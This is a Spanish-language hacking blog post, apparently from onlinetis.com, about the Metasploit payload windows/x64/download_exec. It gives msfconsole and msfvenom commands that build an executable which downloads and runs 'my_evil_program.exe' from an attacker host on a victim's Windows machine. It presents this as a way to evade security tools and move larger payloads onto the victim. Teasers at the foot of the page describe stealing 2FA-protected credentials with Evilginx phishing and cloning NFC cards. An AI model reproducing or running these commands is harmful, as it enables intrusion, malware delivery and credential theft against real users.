Hacking metasploit modulo Windows Download Execute

 

www.onlinetis.com

Hacking metasploit modulo Windows Download Execute.

El uso del payload windows/x64/download_exec en Metasploit.

Este payload es un módulo de Metasploit que permite a un atacante descargar y ejecutar un archivo ejecutable (.exe) en un sistema Windows de 64 bits.

Aquí te explico cómo funciona y cómo se usa:

Descripción del Payload

El payload windows/x64/download_exec es un shellcode que se ejecuta en la memoria de la víctima. Su función principal es descargar un archivo ejecutable desde una URL específica y ejecutarlo en segundo plano. Esto es útil para:

  • Evadir la detección: El payload en sí es pequeño y simple, y la carga maliciosa real se descarga después, lo que puede ayudar a evadir algunas soluciones de seguridad.

  • Post-explotación: Es una forma rápida de mover un payload más grande, como un meterpreter, al sistema de la víctima una vez que se ha obtenido acceso inicial.

  • Flexibilidad: Permite al atacante cambiar el ejecutable que se descarga sin tener que generar un nuevo payload.

Opciones del Payload

Para usar este payload, debes configurar las siguientes opciones:

  • URL: La URL donde se encuentra el archivo ejecutable que deseas descargar. Por ejemplo, http://192.168.1.100/malware.exe.

  • FILENAME: El nombre con el que se guardará el archivo en el sistema de la víctima. Es opcional, y si no se especifica, el nombre del archivo se tomará de la URL.

  • CMD_TIMEOUT: El tiempo de espera en segundos para la ejecución del comando de descarga.

Ejemplo de Uso en Metasploit

A continuación, se muestra un ejemplo básico de cómo se usa este payload dentro de la consola de Metasploit (msfconsole):

  1. Cargar el exploit: Primero, debes seleccionar un exploit que te permita entregar este payload. Por ejemplo, un exploit de vulnerabilidad en un navegador web o un ataque de phishing con un archivo PDF malicioso.

    Bash
    msf6 > use exploit/multi/handler
msf6 exploit(multi/handler) > set PAYLOAD windows/x64/download_exec

  2. Configurar las opciones del payload:

    Bash
    msf6 exploit(multi/handler) > set URL http://192.168.1.100/my_evil_program.exe
msf6 exploit(multi/handler) > set LHOST 192.168.1.100
msf6 exploit(multi/handler) > set LPORT 4444

    • Nota: LHOST y LPORT se usan en el contexto de un handler para escuchar la conexión inversa, aunque este payload no establece una.

  3. Generar el payload: Ahora, puedes generar el payload y exportarlo a un archivo.

    Bash
    msf6 exploit(multi/handler) > generate -f raw -o payload.bin

    También puedes generar el payload directamente con msfvenom:

    Bash
    msfvenom -p windows/x64/download_exec URL=http://192.168.1.100/my_evil_program.exe -f exe -o final_payload.exe

En este caso, msfvenom crea un archivo exe que, al ejecutarse en la máquina de la víctima, descargará y ejecutará my_evil_program.exe desde tu servidor web (192.168.1.100).

Resumen

El payload windows/x64/download_exec es una herramienta eficiente para la ejecución remota de código (RCE). Permite al atacante cargar un ejecutable secundario en el sistema de la víctima, facilitando la escalada de privilegios o el establecimiento de una conexión persistente.

Location: España

Entradas populares de este blog

Ciberseguridad y hacking con Whatweb

Imagen
www.onlinetis.com WhatWeb es una herramienta de código abierto para realizar fingerprinting o huella digital de sitios web . Su principal función es identificar las tecnologías, aplicaciones, servidores y otras configuraciones que se utilizan en una página web. Es muy popular en el ámbito de la ciberseguridad, especialmente en la fase de reconocimiento de una auditoría de seguridad o un test de penetración. ¿Cómo funciona WhatWeb? WhatWeb opera analizando una página web en busca de "firmas" o patrones que revelan la tecnología subyacente. En lugar de ser un escáner de vulnerabilidades completo, se centra en la recopilación de información. Para ello, examina diversos elementos del sitio web, incluyendo: Encabezados HTTP : Analiza las respuestas del servidor para identificar el tipo de servidor web (como Apache o Nginx), el lenguaje de programación (PHP, ASP.NET), o la versión. Código HTML y JavaScript : Busca cadenas de texto, nombres de archivos, comentarios o scripts especí...
LEER MAS »

Como robar contraseñas haciendo un phishing web

Imagen
  www.onlinetis.com Evilginx es una herramienta de phishing de tipo man-in-the-middle (MitM) diseñada para interceptar y robar credenciales de usuario, incluyendo las de sitios web que utilizan autenticación de doble factor (2FA). Su principal objetivo es engañar a las víctimas para que introduzcan sus credenciales en un sitio web falso que parece legítimo. ¿Cómo funciona Evilginx? Evilginx actúa como un proxy inverso. Esto significa que se coloca entre la víctima y el sitio web real que la víctima intenta visitar. Aquí te explicamos los pasos clave de su funcionamiento: Atracción de la víctima : El atacante envía un enlace a la víctima que la dirige al sitio de phishing, el cual está alojado en el servidor donde se ejecuta Evilginx. El dominio de este sitio suele ser muy similar al del sitio web real para no levantar sospechas. Proxy inverso : Cuando la víctima accede al sitio de phishing, Evilginx no solo le presenta una copia idéntica del sitio web real, sino que también red...
LEER MAS »

Arsenal software hacking NFC

Imagen
  www.onlinetis.com Arsenal software hacking NFC Kali Linux incluye varias herramientas especializadas para la auditoría y "hacking" de redes y dispositivos NFC. Estas herramientas están diseñadas para interactuar con las etiquetas y tarjetas NFC para realizar análisis de seguridad, como leer, escribir o clonar datos. Herramientas principales libnfc : Es la biblioteca fundamental que proporciona las funciones básicas para interactuar con dispositivos NFC. Es la base para muchas otras herramientas. Permite listar, leer y escribir en tags NFC. Los comandos más comunes son: nfc-list : Lista los dispositivos y tarjetas NFC conectados. nfc-mfclassic : Utilidad para leer y escribir en tarjetas MIFARE Classic , que son comunes en sistemas de transporte y control de acceso. nfc-mfultralight : Similar al anterior, pero para tarjetas MIFARE Ultralight . mfoc (Mifare Offline Cracker) : Esta es una herramienta crucial para el "hacking" de tarjetas MIFARE Classic. Explota una vu...
LEER MAS »